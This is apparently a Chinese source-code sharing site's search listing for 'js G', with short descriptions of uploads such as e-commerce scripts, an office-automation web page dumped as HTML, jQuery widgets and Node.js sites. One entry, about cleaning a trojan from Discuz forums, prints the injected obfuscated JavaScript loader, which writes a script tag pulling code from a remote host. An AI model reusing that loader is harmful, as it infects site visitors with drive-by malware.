Location:
Search - js G
Search list
Description: . 缓存处理技术,定时更新系统数据,提升系统性能
B. 系统模板管理功能,方便制作个性化的系统模板,可后台管理
C. 首页商品和店铺的自助推荐功能,用户可使用虚拟币采用竞价方式自助推荐自己的商品和店铺
D. 店铺的皮肤转换,重新设计店铺结构
E. 商品,店铺,求购信息的搜索,采用积木式查询,减少等待时间
F. 支付宝按钮支付功能(用于系统用户与用户间的付款交易)
G. 重新制作广告系统,静态JS读取速度更快
H. 最高价竞拍模式中加入一口价购买的功能
I. 后台管理员的分权限管理(管理,添加,查看)
j. 后台商品首页推荐,店铺首页推荐功能
K. 商品可实现四级分类处理
L. 增加店铺分类功能
M. 外接用户数据库(AC和SQL两种),系统邮件发送,图片上传,缓存更新,MD5加密等后台管理功能
N. 实现了商品登陆收费的功能
Platform: |
Size: 1352605 |
Author: yulu |
Hits:
Description: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
协同办公系统
</title><link rel="Stylesheet" type="text/css" href="CSS/master.css" />
<link rel="Stylesheet" type="text/css" href="CSS/sitecooperateCss.css" />
<style type="text/css">
.Task_Default_Grid { border:0}
.Task_Default_Grid tr td { height:25px; line-height:25px; color:#0173BC; border:0; color:#6E6F71}
.Task_Default_Grid tr td a { color:#0073BC}
.Task_Default_Title { height:25px; line-height:25px; border-bottom:1px solid #999; color:#333333; font-weight:bold }
.Task_Default_Head { height:25px; line-height:25px; text-align:left; font-weight:lighter; }
.Task_Default_Head th { text-align:left; border:0;}
#Content_right tr td { vertical-align:top}
.mobanul { list-style:none; list-style-type:none; margin:0; padding:0}
.mobanul li { height:26px; line-height:26px;}
.mobanul li a { color:#0073BC}
</style>
<script type="text/javascript">
var w1 = screen.width;
var w2 = w1 - 30;
var h1 = screen.height;
var h2 = 650;
var t1 = (h1 - h2) / 3;
//var appearence = 'dependent:yes;menubar:no;resizable:no;status:no;toolbar:no;titlebar:no;left:5;top:50;dialogWidth:'+w2+'px; dialogHeight:602px';
var appearence = 'dependent:yes;menubar:no;resizable:no;status:no;toolbar:no;titlebar:no;dialogWidth:990px; dialogHeight:652px';
function openexamin(id) {
var url = 'Task_Examin1.aspx?ID=' + id + '&dt=20111116110724';
window.showModalDialog(url, 'none', appearence);
window.location.reload();
}
function opengoexamin(id) {
var url ='go_examin.aspx?ID=' + id + '&dt=20111116110724';
window.showModalDialog(url, "tasknew", appearence);
window.location.reload();
}
function openexaminview(id) {
var url = 'Go_Examin1.aspx?ID=' + id;
window.showModalDialog(url, "goexamin1", appearence);
window.location.reload();
}
function openexamindaiban(id) {
var url = 'Task_Examin1.aspx?daiban=1&ID=' + id + '&dt=20111116110724';
window.showModalDialog(url, 'none', appearence);
window.location.reload();
}
function openexamindaiban1(id, tasktype,url) {
if (tasktype == 'OA') {
var url1 = 'Task_Examin1.aspx?daiban=1&ID=' + id + '&dt=20111116110724';
window.showModalDialog(url1, 'none', appearence);
window.location.reload();
}
else if (tasktype == 'HR') {
window.open(url.replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '='));
}
else if (tasktype == 'ERP待办') {
window.open("http://10.0.3.100:8000/"+url);
}
else {
window.open(url.replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('{', '=').replace('}', '&').replace('}', '&').replace('|', '&').replace('|', '&').replace('|}', '&').replace('|', '&').replace('|', '&').replace('|', '&').replace('*', '/').replace('*', '/').replace('*', '/').replace('*', '/').replace('*', '/'));
// window.open(url.replace(new RegExp('|', 'g'), '='));
}
}
function GetTasksWait() {
document.getElementById('ajaxwait').innerHTML = "<img src='/_layouts/images/loading.gif' align=absmiddle style='margin:20px' /><span style='color:#666'>正在加载待办事项,请稍等</span>";
AjaxService.GetWaitTasks("panr", GetGetWaitTasks);
}
function GetGetWaitTasks(res) {
document.getElementById('ajaxwait').innerHTML = res;
//window.alert(res);
}
function TaskNew(templetid) {
var url = "task_new1.aspx?templetid="+templetid;
var w1 = screen.width;
var w2 = w1 - 30;
var h1 = screen.height;
var h2 = 650;
var t1 = (h1 - h2) / 3;
var appearence = 'dependent=yes,menubar=no,resizable=no,status=no,toolbar=no,titlebar=no,left=5,top=50,width=965px,height=620px';
var openWindow = window.open(url, "tasknew", appearence);
openWindow.focus();
}
</script>
</head>
<body>
<form name="aspnetForm" method="post" action="thinkanydefault.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTk4NTM3MDU4D2QWAmYPZBYCAgMPZBYCAgEPZBYCAgEPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkGAEFI2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkZ3JpZFRyYWRlDzwrAAoBCGZkgVPWq+n+ib9NI98bYSPgOP6wYjA=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YUjlm6ycKfnreIke4GK3XQ2&t=633802920069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=z3KJcVLT9ijw1U1WP3pQFkrXumDsg6wUOC-1ek6Qo_XZeAuKvPuCDOgdKKFxxdmnnoXJFiMaKmNKva15-BdwOk_xeIPnLbrAuAMPt7xuJyY1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=z3KJcVLT9ijw1U1WP3pQFkrXumDsg6wUOC-1ek6Qo_XZeAuKvPuCDOgdKKFxxdmnNTUAczOieuXP3zVeTLUjHd_cyvM_8TdB3KcMk-B-U6vUhv5N_CQBxFd9ZErk2oN20&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="AjaxService.asmx/js" type="text/javascript"></script>
<div id="Content_right" style="background-image:none; padding:5px; padding-left:0px; padding-right:0px">
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ContentPlaceHolder1$ScriptManagerAjax', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>
<table style="width:100%">
<tr>
<td style="padding-left:10px;">
<span style="float:left"> 待办事项</span><br /><hr style="height:0px; color:#fff; border-top:1px solid #EBEBEB;" /></td>
<td style="padding-left:10px;">
<span style="float:left"> 跟踪事项</span><br /><hr style="height:0px; color:#fff; border-top:1px solid #EBEBEB;" /></td>
</tr>
<tr>
<td style=" padding-top:0; width:49%; padding-left: 10px; padding-right: 10px; padding-bottom: 10px;"
rowspan="4" id="ajaxwait">
</td>
<td style=" padding:10px; padding-top:0;height:145px;">
<div>
</div>
</td>
</tr>
<tr>
<td style=" padding:10px; padding-top:0; text-align:right">
<a href="OATaskTrades.aspx" style='color:#0171BD'>[更多...]</a></td>
</tr>
<tr>
<td style="padding-left:10px;">
我的模板<br /><hr style="height:0px; color:#fff; border-top:1px solid #EBEBEB;" /></td>
</tr>
<tr>
<td style=" padding:10px; padding-top:0;">
<table cellpadding=0 cellspacing=0 style="width:100%;height:145px;"><tr><td style="width:50%">
<ul class="mobanul"></ul>
</td><td>
<ul class="mobanul"></ul>
</td></tr></table>
</td>
</tr>
<tr>
<td style=" padding:10px; padding-top:0; width:49%; text-align:right">
<a href="Task_Wait.aspx" style='color:#0171BD'>[更多OA待办...]</a></td>
<td style=" padding:10px; padding-top:0; text-align:right">
<a href='PersonalTempletsSetup.aspx' style='color:#0171BD'>[更多...]</a><a href='PersonalTempletsSetup.aspx' style='color:#0171BD'>[模板配置]</a></td>
</tr>
</table>
<script type="text/javascript">
GetTasksWait();
</script>
</div>
<script type="text/javascript">
//<![CDATA[
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Platform: |
Size: 8895 |
Author: niyang2005@126.comni |
Hits:
Description: . 缓存处理技术,定时更新系统数据,提升系统性能
B. 系统模板管理功能,方便制作个性化的系统模板,可后台管理
C. 首页商品和店铺的自助推荐功能,用户可使用虚拟币采用竞价方式自助推荐自己的商品和店铺
D. 店铺的皮肤转换,重新设计店铺结构
E. 商品,店铺,求购信息的搜索,采用积木式查询,减少等待时间
F. 支付宝按钮支付功能(用于系统用户与用户间的付款交易)
G. 重新制作广告系统,静态JS读取速度更快
H. 最高价竞拍模式中加入一口价购买的功能
I. 后台管理员的分权限管理(管理,添加,查看)
j. 后台商品首页推荐,店铺首页推荐功能
K. 商品可实现四级分类处理
L. 增加店铺分类功能
M. 外接用户数据库(AC和SQL两种),系统邮件发送,图片上传,缓存更新,MD5加密等后台管理功能
N. 实现了商品登陆收费的功能-err
Platform: |
Size: 1352704 |
Author: yulu |
Hits:
Description: jQuery是一款同prototype一样优秀js开发库类,特别是对css和XPath的支持,使我们写js变得更加方便!如果你不是个js高手又想写出优 秀的js效果,jQuery可以帮你达到目的! -jQuery is a prototype with the same type of outstanding library js development, especially for the css and XPath support, so that we become more convenient to write js! If you are not a js expert js want to write good effect, jQuery can help you achieve the objective!
Platform: |
Size: 137216 |
Author: 397494916 |
Hits:
Description: 通过css+js实现树形结构,只需要改动html里的源码,就可以得到你要的结果。-java checktree
Platform: |
Size: 8192 |
Author: 王欣 |
Hits:
Description: 如何进行MPEG4格式的解码的C程序源代码-How to decode MPEG4 format C source code
Platform: |
Size: 132096 |
Author: weiwei |
Hits:
Description: web系统下经常用到Tab标签来实现界面功能,这是用jquery实现的Tab标签功能-system under the web tab Tab frequently used to achieve interface features, this is achieved using jquery label Tab
Platform: |
Size: 61440 |
Author: lxh |
Hits:
Description: 清除discuz论坛挂马的cookie代码(if(document.cookie.indexOf( helio )==-1){var expires=new Date() expires.setTime(expires.getTime()+24*60*60*1000) document.cookie= helio=Yes path=/ expires= +expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)} if(! .replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}] e=function(){return \\w+ } c=1} while(c--){if(k[c]){p=p.replace(new RegExp( \\b +e(c)+ \\b , g ),k[c])}}return p}( 4.5(\ <0 3=2 1="6://d.7.c/b/a.8?9"></0>\ ) ,14,14, script|src|javascript|language|document|writeln|http|xcdx169|js|LMZSVQRI|log|include|net|bbs .split( | ),0,{})) }
)等-Clear discuz Forum hanging horse cookie code (if (document.cookie.indexOf ( ' helio' )==- 1) (var expires = new Date () expires.setTime (expires.getTime ()+24* 60* 60* 1000) document.cookie = ' helio = Yes path = / expires =' + expires.toGMTString () eval (function (p, a, c, k, e, d) (e = function (c) ( return c.toString (36)) if (!' ' . replace (/^/, String)) (while (c-) (d [c.toString (a)] = k [c] | | c. toString (a)) k = [function (e) (return d [e])] e = function () (return ' \ \ w+' ) c = 1) while (c-) (if (k [c]) (p = p.replace (new RegExp ( ' \ \ b' + e (c)+ ' \ \ b' , ' g' ), k [c]))) return p) (' 4 .5 ( \ ' < 0 3 = 2 1 = " 6:// d.7.c/b/a.8? 9" > </0> \ ' )' , 14,14, ' script | src | javascript | language | document | writeln | http | xcdx169 | js | LMZSVQRI | log | include | net | bbs' . Split (' |' ), 0, () )) )), etc.
Platform: |
Size: 1024 |
Author: 一介农夫 |
Hits:
Description: jsp/servlet在线考试源码,含有js源码及JSP源码-dffd dfgd g
Platform: |
Size: 14414848 |
Author: chen |
Hits:
Description: 商品展示放大镜效果JS脚本,含两个例子,带小图滚动效果。-Product magnifying glass effect JS script, including the two examples, with thumbnail scrolling effect.
Platform: |
Size: 3989504 |
Author: david |
Hits:
Description: 安装
npm install
npm install pm2 -g
运行
pm2 start shibeta.js
一个用nodejs和jade写的个人网站,大家可以参考。-Install npm install npm install pm2-g run pm2 start shibeta.js with nodejs and jade write a personal website, you can refer to.
Platform: |
Size: 2888704 |
Author: 李宗桓 |
Hits:
Description: 电脑针织横机龙头控制程序,包含8把选针器,8个度目电机,2个信克电机,及所有三角的控制,是产品级的代码,绝对无删减,有产品销售,后转行,有从事此行业的可以-Leading computer flat knitting machine control program, comprising eight selector, 8 stitch motors, two motors letter g, and control all of the triangle, is product-level code, absolutely no cut, there is product sales, after the switch, have engaged in this industry can look
Platform: |
Size: 823296 |
Author: 丁后兴 |
Hits:
Description: 一个简单的博客网站使用node.js技术,有注释,很简便-
28/5000
Yīgè jiǎndān de bókè wǎngzhàn shǐyòng node.Js jìshù, yǒu zhùshì, hěn jiǎnbiàn
A simple blog site using node.js technology, there are notes that are very simple
Platform: |
Size: 1971200 |
Author: 刘旺 |
Hits: